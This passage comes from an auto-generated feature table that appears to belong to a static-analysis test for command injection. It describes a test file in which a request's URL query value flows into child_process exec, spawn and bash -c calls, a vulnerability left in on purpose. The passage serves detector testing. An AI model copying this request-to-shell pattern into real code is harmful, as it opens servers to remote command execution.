http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:16:52:16 | - | stringConcatenatedWith | -endpoint- 'c' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:52:21:52:23 | "c" | stringConcatenatedWith | '-' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:11 | args[1] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:11 | args[1] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:11 | args[1] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:11 | args[1] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:11 | args[1] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:17 | args[1] = cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:17 | args[1] = cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:17 | args[1] = cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:17 | args[1] = cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:5:53:17 | args[1] = cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:10:53:10 | 1 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:10:53:10 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:10:53:10 | 1 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:10:53:10 | 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:10:53:10 | 1 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | assignedToPropName | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:53:15:53:17 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:15 | cp.execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:15 | cp.execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:15 | cp.execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:15 | cp.execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:15 | cp.execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | exceptional return of cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | exceptional return of cp.exec ... , args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | exceptional return of cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | exceptional return of cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | exceptional return of cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:8:54:15 | execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:8:54:15 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:8:54:15 | execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:8:54:15 | execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:8:54:15 | execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:22 | `/bin` | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:22 | `/bin` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:22 | `/bin` | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:22 | `/bin` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:22 | `/bin` | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:17:54:32 | `/bin` + "/bash" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:18:54:21 | /bin | stringConcatenatedWith | -endpoint- '/bash' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:26:54:32 | "/bash" | stringConcatenatedWith | '/bin' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:35:54:38 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:12 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:12 | cp.spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:12 | cp.spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs 